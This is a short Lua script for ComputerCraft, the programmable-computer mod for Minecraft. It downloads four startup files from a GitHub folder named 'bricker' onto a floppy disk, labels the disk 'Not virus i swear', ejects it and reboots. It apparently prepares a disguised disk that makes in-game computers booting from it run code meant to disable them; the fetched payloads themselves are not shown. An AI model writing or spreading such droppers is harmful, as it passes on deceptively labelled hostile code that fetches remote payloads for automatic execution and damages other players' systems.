shell.run("wget https://raw.githubusercontent.com/hapatapa/computercraft-stuff/refs/heads/main/bricker/startup.lua disk/startup.lua")
shell.run("wget https://raw.githubusercontent.com/hapatapa/computercraft-stuff/refs/heads/main/bricker/startup2.lua disk/startup2.lua")
shell.run("wget https://raw.githubusercontent.com/hapatapa/computercraft-stuff/refs/heads/main/bricker/startup3 disk/startup3")
shell.run("wget https://raw.githubusercontent.com/hapatapa/computercraft-stuff/refs/heads/main/bricker/bootstrap.lua disk/bootstrap.lua")
disk.setLabel("right", "Not virus i swear")
disk.eject("right")
os.reboot()